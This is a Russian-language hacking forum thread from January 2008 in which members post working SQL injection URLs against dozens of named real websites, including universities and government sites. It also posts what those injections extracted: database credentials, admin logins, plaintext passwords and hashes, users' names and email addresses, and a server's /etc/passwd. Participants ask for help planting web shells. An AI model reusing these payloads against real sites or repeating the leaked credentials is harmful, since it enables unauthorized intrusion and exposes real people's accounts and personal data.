http://www.travelhit.pl/kontakt/?category=2'+union+select+1,2,concat(login,0x3a,pa sswd),4,5+from+xml_providers/*
5.0.45-community
hermantravel:merLINxLasT
но он никуда не подошёл
есть :
http://www.travelhit.pl/admin
http://www.travelhit.pl/cpanel
----------------------------------------------------------------------
http://eurowizja.org/almanach.php?akcja=rocznik&rok=-2001+union+select+1,2,3,table_name,column_name,6,7 ,8,9,0,1,2,3,4,5,6+from+information_schema.columns/*
5.0.45-community
http://eurowizja.org/almanach.php?akcja=rocznik&rok=-2001+union+select+1,2,3,concat_ws(0x3a,login,kod,e mail,gg,cos4),5,6,7,8,9,0,1,2,3,4,5,6+from+members/*
куча всякой дряни на их родном языке ((
----------------------------------------------------------------------
http://www.euro.deal.pl/08_news.php?id=149100+union+select+1,2,3,4,5,6,con cat_ws(0x3a,login,kod,email,gg,cos4),8,9,0,1,2,3,4 ,5,6+from+members/*
5.0.45-community

v1ru$

08.01.2008, 16:46

http://www.compasspoint.org/boardcafe/details.php?id=805+union+select+1,2,aes_decrypt(ae s_encrypt(concat(user(),0x3a,version(),0x3a,databa se(),0x71),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19/*

compasspoint@localhost:4.1.11-Debian_4sarge7-log:compasspointq

http://www.hornets247.com/post.php?id=37007+union+select+1,concat(version(), 0x3a,database(),0x3a,user()),3,4,5/*

4.0.27maxlog:hornets247_v4_0:hornets247_v4_0@linho st194.prod.mesa1.secureserver.net

http://skyscrapernews.com/buildings.php?id=223+order+by+229/*

229 столбцов)))

je0n

08.01.2008, 18:03

http://www.natria.ru/news.php?list=-18+union+select+1,database(),user(),4,version()/*
zarva2@localhost
4.0.18-standard
db_zarva2

ниче выжать не удалось

K1nD[e]R

08.01.2008, 19:05

http://www.hogwartsnet.ru/fanf/member.php?id=-1653+union+select+concat_ws(0x2F,version(),id,name ,password),2,3,4,5,6,7,8,9+from+u45544_ipbd.ipbd_f orums/*
Version 5.0.46

K1nD[e]R

08.01.2008, 19:17

http://team-rs.ru
http://team-rs.ru/member.php?id=-24+union+select+1,2,3,4,concat_ws(0x2F,id,login,pa ssword),6,version(),8,9,10+from+dtool_users/*
Version : 5.0.45-log/u13952@10.10.10.218/u13952

login / password

30VC06T0 / 2A3TFH5A
4YYH6M58 / 5M42I233

~EviL~

08.01.2008, 21:04

http://voss.kyrkjer.net/

http://voss.kyrkjer.net/news.php?news_id=14'+UNION+SELECT+1,2,3,4,concat_w s(0x3a,version(),user(),database()),6,7,8,9,10,11, 12,13/*
4.0.20-standard:voss@localhost:voss

http://www.antonwachterprijs.nl/

http://www.antonwachterprijs.nl/top1.php?news_id=-21'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8/*
4.1.22-community-nt:flyingbookmarks@localhost:awp

.Begemot.

08.01.2008, 22:29

Какой то, самописный наверное, двиг.
В админке есть возможность заливки файлов на сервер. Шеллы палит.

csgn.org

http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert( concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usin g+latin1),8,9,10,11,12,13,14,15/*

USER:ahiggins@WEB02.WGA.COM
VERSION:5.0.19-nt
DATABASE:csgn

http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert( concat(id,0x3a,name,0x3a,password)+using+latin1),8 ,9,10,11,12,13,14,15+from+user/*

http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert( concat(table_name)+using+latin1),8,9,10,11,12,13,1 4,15+from+information_schema.tables/* - названия всех таблиц

http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert( concat(column_name)+using+latin1),8,9,10,11,12,13, 14,15+from+information_schema.columns/* - названия всех колонок

Таблица - user
Поля - id,name,password

1:ahiggins:new123 - админ

Раскрутил по полной ;)

Tigger

08.01.2008, 23:00

http://www.hr-forum.kz/news.php?id=-10+union+select+1,2,3,concat_ws(0x2f,user(),versio n(),database())/*
hrforumk_root@localhost/4.1.22-standard/hrforumk_hr
-----------------------------------------------------------------------
http://www.alians.kz
http://www.alians.kz/news.php?p=11&id=-60+union+select+1,2,3,4,CONVERT(table_name+using+l atin1),6+from+information_schema.tables/*
Все таблицы...но на страницы поддерживаются не все, так что дольше через limit
http://www.alians.kz/news.php?p=11&id=-60+union+select+1,2,3,4,CONVERT(column_name+using+ latin1),6+from+information_schema.columns+limit+4, 50/*
Все колонки...но на страницы поддерживаются не все, так что дольше через limit
-----------------------------------------------------------------------
http://www.artbox.cz/news.php?id=-17+union+select+1,2,3,4,5,6,7,8,concat(login,char( 58),pass),10+from+users/*
administrator:d41d8cd98f00b204e9800998ecf8427e:<no password>
-----------------------------------------------------------------------
http://etteam.avonet.cz/news.php?id=-88+union+select+1,2,3,4,5,6,7,8,9+from+admin/*
Поля не подобрал((
-----------------------------------------------------------------------
http://www.adatio.cz/news.php?id=-12+union+select+1,2,3,table_name+from+information_ schema.tables/*
Все таблицы
http://www.adatio.cz/news.php?id=-12+union+select+1,2,3,column_name+from+information _schema.columns/*
Все колонки
-----------------------------------------------------------------------
http://www.diazivot.cz/news.php?id=-37+union+select+1,2,3,4,5,concat_ws(0x2f,user(),ve rsion(),database()),7,8,9/*
-----------------------------------------------------------------------
http://www.krd.cz/news.php?id=-72+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------
tyma@localhost/4.1.20-log/tyma
-----------------------------------------------------------------------
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,concat_ws(0x2f,user( ),version(),database())/*
carbon.hotgames.cz@193.86.238.14/5.0.45-log/carbon_hotgames_cz
Все таблицы:
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,table_name+from+info rmation_schema.tables/*
Все колонки:
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,column_name+from+inf ormation_schema.columns/*
-----------------------------------------------------------------------
http://www.protocolservice.cz/news.php?id=-1146736800+union+select+1,2,3,4,5,6+from+user/*
Поля не подобрал
-----------------------------------------------------------------------
http://www.hczralocivyskov.cz/news.php?id=35+union+select+1,2,3,concat_ws(0x2f,u ser(),version(),database()),5,6,7,8/*
db4871_hczv@85.93.165.120/4.1.14-Debian_3/db4871_hczv

159932

08.01.2008, 23:31

www.agroelsalvador.com
http://www.agroelsalvador.com/directorio/index.php?idDirectorio=-652+union+select+1,concat_ws(0x3a,user,password),3 ,4,5,6,7,8,9,0,1+from+mysql.user/*
полностю раскрученная
http://www.agroelsalvador.com/phpmyadmin
mag:mag112

~EviL~

08.01.2008, 23:34

http://www.networkofdisclosure.com/

http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,version(),user( ),database()),4/*
5.0.45-community:networko_user@localhost:networko_db

http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,user_id,usernam e,user_password),4+FROM+users+LIMIT+10,1/*
4:Jay Fishman:bf4cf16ad122a0cdc77b3c84b637219f::f1shman
5:Brad Hamann:00cdb7bb942cf6b290ceb97d6aca64a3:: password7
7:Brent Moeshlin:7c3d0453108aefa46c07e91c8bc031d3:: officer1
9:Court Eilertson:6db6339dbf5ebc3ce4b1af93a8dfec58::count1

http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,member_id,email ,password),4+FROM+member+LIMIT+7,1/*
27:jaybfishman@aol.com:bf4cf16ad122a0cdc77b3c84b63 7219f::f1shman
7:bmoeshlin@qualitycomix.com:7c3d0453108aefa46c07e 91c8bc031d3:: officer1
9:ceilert@msn.com:6db6339dbf5ebc3ce4b1af93a8dfec58 ::count1
2:Nearmint@aol.com:f1c943880885e79825464b0f86f80f6 e::424344

С мейл:пас сюда: http://www.networkofdisclosure.com/login.php,
а там можно еще зайти под тем же логином на форум. Кнопка Member's Forum.

fobofob

08.01.2008, 23:38

Прошу прощения если боян,на форуме не нашел скуль с этим сайтом

http://www.5ballov.ru/vacansy.php?salary_min=null+union+select+1,2,3,4,5 ,6,7,concat(table_name,0x3a,column_name),9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. columns/*
вывод-все сразу

http://www.5ballov.ru/vacansy.php?salary_min=null+union+select+1,2,3,4,5 ,6,7,count(0x3a,name,nick,log,pas,email),9,10,11,1 2,13,14,15,16,17,18,19,20+from+users/*

единственная таблица с интересным :D юзеров больше 20000

ElteRUS

08.01.2008, 23:52

http://guvd72.ru/index.php?module_name=news&action=show_full&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4/*

4.1.22-standard-log/guvd72r_db/guvd72r_user@localhost
-----------------------------------------------------------------------------

http://www.energots.ru/ru/?publication=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7/*

4.0.26-log/udb921/Uwww921S@localhost
-----------------------------------------------------------------------------

showbizer.com

http://ru.showbizer.com/news_firm.php?id_news=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9,10,11,12/*

5.0.45-log/showbiz/showbiz@localhost

http://ru.showbizer.com/news_firm.php?id_news=-1'+union+select+1,2,3,4,concat_ws(0x2F,login,passw ord,e_mail),6,7,8,9,10,11,12+from+sb_firms+limit+1 ,1/*

логин/пароль/мейл
aviator/8196/concert@mamamusic.ua

Constantine

09.01.2008, 00:03

http://www.rodina.by/book/info/go/-83181%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20ac counts/*.html
http://www.rodina.by/book/info/go/-83181%20union%20select%201,name,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%2 0members/*.html

Ded MustD!e

09.01.2008, 01:32

http://www.metrovalencia.gob.ve/ Метро Венесуэлы=)

http://www.metrovalencia.gob.ve/contenido.php?id=-1'+union+select+1,2,3,4,5,6,aes_decrypt(aes_encryp t(concat_ws(0x3a,user(),database(),version()),0x78 ),0x78),8,9,10,11,12,13,14,15,16,17,18/*

http://www.mes.gov.ve/ Министерство Высшего Образования Венесуэлы

http://www.mes.gov.ve/informa/noticias.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8/*

http://inforc.org.ve/ Национальный Институт Дополнительного Высшего Образования Венесуэлы

http://inforc.org.ve/detalle_evento.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30/*

А®ТеS

09.01.2008, 01:37

2Ded MustD!e: А Венесуэла это где? =\
http://nhia.edu

http://www.nhia.edu/news.php?id=-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(VERSI ON(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26/*

БД 4. Таблицы не удалось подобрать, админка в стандартной /admin/.
http://knigki.ru/

http://knigki.ru/sexylib/list.php?gid=-1+UNION+SELECT+VERSION()/*

Извращенцы. Всякие тупые порно рассказы, БД 5.

Tigger

09.01.2008, 01:44

http://www.mdnationwide.tv/news.php?submit_action=article&nid=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6/*
4.1.20/mdnationwidetv@localhost/mdnationwidetv
-----------------------------------------------------------------------
Все таблицы:
http://www.punjabtv.tv/news.php?id=-3552+union+select+1,table_name,3,4,5,6,7,8,9+from+ information_schema.tables/*
Все колонки
http://www.punjabtv.tv/news.php?id=-3552+union+select+1,column_name,3,4,5,6,7,8,9+from +information_schema.columns/*
Есть полезные таблицы:
user
users
Колонки ищите сами))
-----------------------------------------------------------------------
http://library.tc.columbia.edu/news.php?id=208'
Извините за пост...В MsSQL не раздираюсь...вот вам...вы разберетесь))
-----------------------------------------------------------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-1270+union+select+1,CONVERT(concat_ws(0x3a,version (),user(),database())+using+latin1),3,4,5/*
4.1.12-standard-log:klein@localhost:wolfpack
-----------------------------------------------------------------------
http://www.entrepreneurship.appstate.edu/news.php?id=-46+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6/*
4.1.20/entrepreneur@localhost/entrepreneur
-----------------------------------------------------------------------
http://www.eng.wayne.edu/news.php?id=-852+union+select+1,2,3,pwd,5,6,7,8,9,10,11,12,13+f rom+users/*
Колонки не подобрал
-----------------------------------------------------------------------
Все таблицы:
http://www.multimedia.edu/news.php?id=-7+union+select+1,2,table_name,4,5+from+information _schema.tables/*
Все колонки:
http://www.multimedia.edu/news.php?id=-7+union+select+1,2,column_name,4,5+from+informatio n_schema.columns/*
-----------------------------------------------------------------------
http://vl2.gallaudet.edu/news.php?id=-20+union+select+1,2,concat(user,char(58),password) ,4,5,6,7,8,9,10,11+from+mysql.user/*
root:*90B8B931F28082EF4AD1DA2A8787314B0A4246AA

fRg

09.01.2008, 11:45

avtomir.ru - Группа компаний Автомир, крупнейший автомобильный дилер в Россииhttp://www.avtomir.ru/ru/news/index.php?id4=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12,13,14,15/* 4.1.22:avtomir-www:avtomir-www@localhost

Нашёл табу ADMINISTRATOR с полями LOGIN и EMAIL

Tigger

09.01.2008, 13:32

http://www.akata.fr/news.php?id=-176+union+select+1,concat_ws(0x2f,version(),user() ,database()),3,4,5,6,7,8,9,10/*
4.0.17-standard-log/akatav2@10.0.62.16/akatav2
-----------------------------------------------------------------------
http://www.internazionale.fr/news.php?id=-1529+union+select+1,concat_ws(0x2f,version(),user( ),database()),3,4,5,6,7,8,9/*
4.1.22-log/internazionale@localhost/interklan
-----------------------------------------------------------------------
http://www.logiconfor.fr/news.php?id=-19+union+select+1,2,concat_ws(0x2f,version(),user( ),database()),4/*
5.0.44-log/logiconf001@10.0.78.3/logiconf001
-----------------------------------------------------------------------
http://www.sequant.com/sn/news.php?id=-22+union+select+1,2,3,concat_ws(0x2f,version(),use r(),database()),5,6/*
4.1.21-Max/u1015325_xCR5CZ6@83.168.227.153/db1015325_sequant
-----------------------------------------------------------------------
http://sever.co.il
http://sever.co.il/news.php?id=-78+union+select+1,2,3,concat(user,char(58),passwor d),5,6,7,8,9+from+mysql.user/*
root:*1611455133BEB42BD070C44CBDCDCAEDB73E9156
Дальше можно через лимит...например: http://sever.co.il/news.php?id=-78+union+select+1,2,3,concat(user,char(58),passwor d),5,6,7,8,9+from+mysql.user+limit+1,50/*
Все таблицы:
http://sever.co.il/news.php?id=-78+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables+limit+15,100/*
Все колонки:
http://sever.co.il/news.php?id=-78+union+select+1,2,3,column_name,5,6,7,8,9+from+i nformation_schema.columns+limit+15,100/*
-----------------------------------------------------------------------

ElteRUS

09.01.2008, 14:14

vimkon.ru интернет-магазин

http://www.vimkon.ru/news.php3?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user()),8,9/*

5.0.45/vimkon/vimkon@localhost

http://www.vimkon.ru/news.php3?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,pa ss,email),8,9+from+client+limit+100,1/*

логин/пароль/мейл
algis/algisf1/info@algis.ru

Dr.Z3r0

09.01.2008, 14:44

www.freeru.info
http://www.freeru.info/category.php/?cat1=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT_WS(0x203A20,V ERSION(),USER(),DATABASE()),15,16,CONCAT_WS(0x203A 20,TABLE_SCHEMA,TABLE_NAME),18,19,20 FROM INFORMATION_SCHEMA.TABLES/*

10-key.ru
http://10-key.ru/contests.php?mod=2' AND 1=2 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME ),6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>'information_schema'/*

Оба сайта на одном серваке... так вот если кто нить зальет шелл, у мну например скока не пытался не получилось, буду очень признателен если вы мне об этом сообщите...
как бонус читалка хтмлок на этом же сервере:http://olva-stroy.ru/index.php?str=

.Begemot.

09.01.2008, 14:59

thefetus.net

http://www.thefetus.net/page.php?id=-1149+union+select+0,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11,12,13/*

USER:fetus@localhost
VERSION:5.0.37-community-nt
DATABASE:thefetus

http://www.thefetus.net/page.php?id=-1149+union+select+0,table_name,2,3,4,5,6,7,8,9,10, 11,12,13+from+information_schema.tables+limit+95,1 00/* - все таблици

http://www.thefetus.net/page.php?id=-1149+union+select+0,column_name,2,3,4,5,6,7,8,9,10 ,11,12,13+from+information_schema.columns/* - все столбци

chilliwackheritagepark.com

http://www.chilliwackheritagepark.com/page.php?id=-50+union+select+0,1,2,3,4,5,convert(concat(USER(), 0x3a,VERSION(),0x3a,DATABASE())+using+latin1),7,8, 9,10,11,12,13,14,15,16,17,18/*
USER:chwk_arts@localhost
VERSION:4.1.16
DATABASE:chwk_arts

ElteRUS

09.01.2008, 15:01

property-fund.ru

http://www.property-fund.ru/ru/news_show.phtml?news=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,ve rsion(),database(),user()),11,12,13,14,15/*

4.1.20/profnd/profnd@localhost

http://www.property-fund.ru/ru/news_show.phtml?news=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,us ername,user_password,user_email),11,12,13,14,15+fr om+phpbb_users+limit+1,1/*

логин/хеш/мейл
admin/21232f297a57a5a743894a0e4a801fc3/admin@admin.ru

Юзаем http://md5.xek.cc/

21232f297a57a5a743894a0e4a801fc3;admin

Dr.Z3r0

09.01.2008, 17:19

wwwrsphysse.anu.edu.au
http://wwwrsphysse.anu.edu.au/nuclear/personnel.php?id=-50 UNION SELECT 1,2,3,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME), 5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>0x494E464F524D4154494F4E5F534348454D41/*
почти edu)))

А®ТеS

09.01.2008, 17:55

http://www.democracy.ru/

http://www.democracy.ru/article.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3A,USER(),DATABASE( ),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

Организация ИРИС, цель которой "донести до избирателя реальные цели и задачи кандидатов, оплот демократии" (примерно так, не цитата, но смысл ясен). '99 года выпуска. Инъекция совершенно лобовая. БД 4, таблицы не подобрал.
З.Ы. Ипал я в рот такую демократию, на индексе почти все топики о "Национальном лидере России В.В. Путине". Короче очередная продажная организация.

SametZ

09.01.2008, 21:14

alterego.tut.by
homenet.tut.by
Толком ничего не накопал,но ресурс вроде известен.
_____________
http://alterego.tut.by/library/showarticle.php?id=-65%20UNION%20SELECT%201,version(),user(),database( ),5,6/*
_____________
http://homenet.tut.by/?action=notes&id=24471' - тут вообще нихрена не копается =\
_____________
P.S. Не судите строго,в хокинге я пока новичок.Да и ламарез в мск сьебался - некому учить =(

.Begemot.

09.01.2008, 22:05

http://homenet.tut.by/?action=notes&id=24471' - тут вообще нихрена не копается =\
Тут нет инжекции(

tgao.ca

http://www.tgao.ca/page.php?id=-9+union+select+0,1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3/*

USER:tgao_tgao2@localhost
VERSION:5.0.27-standard
DATABASE:tgao_tgao2

http://www.tgao.ca/page.php?id=-9+union+select+0,1,table_name,3+from+information_s chema.tables+limit+45,1/*

http://www.tgao.ca/page.php?id=-9+union+select+0,1,column_name,3+from+information_ schema.columns+limit+0,1/*

lucon.ru

http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,concat(USE R(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/*

USER:lucon1@localhost
VERSION:5.0.24-standard
DATABASE:db_lucon1

http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,table_name ,6,7,8,9+from+information_schema.tables/* - все таблици

http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,column_nam e,6,7,8,9+from+information_schema.columns/* - все поля

alex-travel.ru

http://www.alex-travel.ru/strana.php?strana=2+union+select+0,1,2,3,4,5,6,7,8 ,9,10,11/*

159932

10.01.2008, 00:21

www.api.org.il
http://www.api.org.il/Съезды-c--22+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat (user,0x3a,password),6,7,8,9+from+mysql.user+limit +0,1/*.html
5.0.32-Debian_7etch3-log
root:*1611455133BEB42BD070C44CBDCDCAEDB73E9156:l1n 22q
http://www.api.org.il/admin/index.php
есть только пасс от рута базы (l1n22q) ... логин подобрать с админке не могу ... авось и пасс другой ((
есть таблы (users,adm_users) итд ... но в них не попасть или я сильно туплю...

Tigger

10.01.2008, 01:17

http://www.sieve.gr/gr/news.php?id=-142+union+select+1,2,concat_ws(0x2f,version(),user (),database()),4/*
4.1.22-standard/sieve@localhost/sieve_gr
Есть таблица users
Колонки в ней не подобрал
-----------------------------------------------------------------------
http://www.x-plorer.gr/news.php?id=-8+union+select+1,2,concat(user,char(58),password), 4,5+from+mysql.user/*
root:*046A241131BA9D25793B8012B8DCA213827E3DB9
Все таблицы
http://www.x-plorer.gr/news.php?id=-8+union+select+table_name,2,3,4,5+from+information _schema.tables/*
Все колонки
http://www.x-plorer.gr/news.php?id=-8+union+select+column_name,2,3,4,5+from+informatio n_schema.columns/*
Там есть еще и phpBB форум))

Tigger

10.01.2008, 02:03

http://www.jetskiworld.gr/news.php?id=-626+union+select+1,2,3,4,concat_ws(0x2f,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57/*
4.1.20-log/331329_jetski@172.16.12.165/331329_jetskiworld
-----------------------------------------------------------------------
http://www.sedici.gr/news.php?id=-2+union+select+1,2,3,4,5,6,concat_ws(0x2f,version( ),user(),database()),8,9/*
4.1.19-standard-log/sedicig@localhost/sedicig_db
Включите колонки погромче (на сайте играет музыка как раз для взлома) и брутьте таблицы и колонки))
-----------------------------------------------------------------------
http://www.naserron.gr/news.php?id=-197+union+select+1,2,concat_ws(0x2f,version(),user (),database()),4,5/*&sub=show
5.0.33-log/naserron@localhost/naserron
Все таблицы:
http://www.naserron.gr/news.php?id=-197+union+select+1,2,3,table_name,5+from+informati on_schema.tables/*&sub=show
Все колонки
http://www.naserron.gr/news.php?id=-197+union+select+1,2,3,column_name,5+from+informat ion_schema.columns/*&sub=show
-----------------------------------------------------------------------
http://www.rea.org.gr/gr/news.php?id=-72+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5/*
4.1.22-standard/reaorg@localhost/reaorg_1
Есть таблица users
Колонки не подобрал
-----------------------------------------------------------------------
http://www.omase.gr/gr/news.php?id=-12+union+select+1,2,3,4,5+from+users/*
-----------------------------------------------------------------------
http://www.todaneio.gr/news.php?id=-181+union+select+1,2,3,CONVERT(concat_ws(0x3a,vers ion(),user(),database())+using+latin1),5,6,7,8,9,1 0,11,12,13,14/*
4.1.14:daneio@localhost:todaneio

Tigger

10.01.2008, 02:27

http://www.alpharent.gr/gr/news.php?id=17+union+select+1,2,3,4+from+users/*
-----------------------------------------------------------------------
http://www.alogoskoufis.gr/news.php?version=gr&id=-184+union+select+1,concat_ws(0x2f,version(),user() ,database()),3/*&view=more
4.1.22-standard/alogos_user@localhost/alogos_db
-----------------------------------------------------------------------
http://www.silvestridis.gr/news.php?id=-1+union+select+1,%20%20concat_ws(0x2f,version(),us er(),database()),3,4,5/*
4.1.22-standard/silvestr_yiannos@localhost/silvestr_silvestridis
Есть таблица users

DezMond™

10.01.2008, 03:42

http://www.davinciinstitute.com/page.php?ID=299'+union+select+1,2,3,concat_ws(0x2f ,version(),user(),database()),5,6+from+inform ation_schema.columns/*

5.0.42/davinci@localhost/davinciinstitute_com

--------------------------------------------------------------------

http://www.bigrap.ru/index.php?mod=multimedia&action=music&album_id=-12+union+select+1,null,concat_ws(0x3a,version(),da tabase(),user()),4,5,6,concat_ws(0x3a,name,pass),8 ,9,10,11+from+sla mchik_rap.users+limit+3,7/*

Login:saniol pass:dancer2j

5.0.45-community:slamchik_rap:slamchik_slam@localhost

DezMond™

10.01.2008, 04:15

http://www.newera.com.na/page.php?id=25+union+select+1,2,concat_ws(0x3a,ver sion(),user(),database()),4,5,6/*

.Begemot.

10.01.2008, 17:18

spacetravel.tomsk.ru

http://spacetravel.tomsk.ru/index.html?div=2forum&topic=-194+union+select+0,1,2,3,4,5,6/*&start=0

http://spacetravel.tomsk.ru/index.html?div=2forum&topic=-194+union+select+0,1,2,concat(USER(),0x3a,VERSION( ),0x3a,DATABASE()),4,5,6/*&start=0

USER:spacetravelwww@localhost
VERSION:4.0.26
DATABASE:spacetravelwww

_BIOS_

10.01.2008, 21:35

http://askort.com/?item_id=1+and+2=0+union+select+1,AES_DECRYPT(AES_ ENCRYPT(version(),0x71),0x71),3,4/*

USER : maxivanov_askort@localhost
VERSION : 4.1.11
DATABASE : maxivanov_askort

.Begemot.

10.01.2008, 21:47

bravotour.ru
http://www.bravotour.ru/cont.php?id=-186+union+select+0,1,concat(USER(),0x3a,VERSION(), 0x3a,DATABASE()),3/*
USER:bravotou_bravo@localhost
VERSION:4.1.22-standard-log
DATABASE: bravotou_bravobase

rsci.ru
http://www.rsci.ru/smi/?id=10204+union+select+0,concat(USER(),0x3a,VERSIO N(),0x3a,DATABASE())/*
USER:rsci@zvm8.host.ru
VERSION:4.0.27-log
DATABASE:rsci
http://www.rsci.ru/smi/?id=10204+union+select+0,concat(id,0x3a,name,0x3a, passwd)+from+users+limit+2,2/*
10:administrator:.hbq
2:Юрий:.hbq
http://www.rsci.ru/admin/

ElteRUS

10.01.2008, 22:43

http://mercury-sochi.ru/news/index.php?type=rn&newsid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7,8,9,10/*

4.1.22/merc16/merc16@localhost

----------------------------------------------------------------------------

http://www.home-collection.ru/catalog.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user())/*

5.0.45-log/u12151/u12151@10.10.223.210
----------------------------------------------------------------------------
miheeff.net

http://miheeff.net/news.php?news_id=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2,3/*

5.0.33/db5179d/us5179d@localhost

http://miheeff.net/news.php?news_id=-1+union+select+concat_ws(0x2F,login,pass),2,3+from +logins+limit+2,1/*

логин/пароль
alia/zzzxxx

Welemir

10.01.2008, 23:03

http://www.dukemednews.org/news/article.php?id=10059+union+select+0,1,2,3,user,pas sword,6,7+from+mysql.user/*

зачооот ))).Первый раз чето сделал гг)))

всем пасибко =)

.Hk

11.01.2008, 01:00

http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email) ,2+from+top_user+limit+0,1/*

http://www.wordtec.com/TopSites/rate.php?site=-1+union+select+concat_ws(0x3a,database(),user()),2/*

http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email) ,2+from+top_user+limit+0,1/*

_BIOS_

11.01.2008, 01:06

http://www.linspire.com/linspire_letter_archives.php?id=1+and+2=0+union+se lect+1,concat_ws(0x3a,version(),user()),3,4/*
version : 4.0.27-standard-log
user : linspire@10.0.0.20

~EviL~

11.01.2008, 02:43

www.chatelet-theatre.com

http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27/*
4.1.20:root@localhost:chatelet

http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,user,password),2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27+FROM+mysql.user/*
root:3def4e5361e65bde (user: pass(hash)) (http://www.chatelet-theatre.com/admin/)

http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+LOAD_FILE(0x2f6574632f70617373776 4),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27/*
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0: operator:/root:/sbin/nologin
...

1NtR0

11.01.2008, 04:59

http://www.dukemednews.duke.edu/news/article.php?id=-801+union+select+1,concat_ws(0x3a,user,password),3 ,4,5,6,7,8+FROM+mysql.user/*

А®ТеS

11.01.2008, 05:05

http://www.sportingwheelies.org.au/

http://www.sportingwheelies.org.au/page.htm?ID=-1+union+select+1,concat_ws(0x3a,login,password),3+ FROM+SW_SITE.security+LIMIT+5,1/*
Админку не нашел, но зато штук десять акков добыть можно (правда нахрен они без админки большой вопрос xD).

rankor777

11.01.2008, 08:33

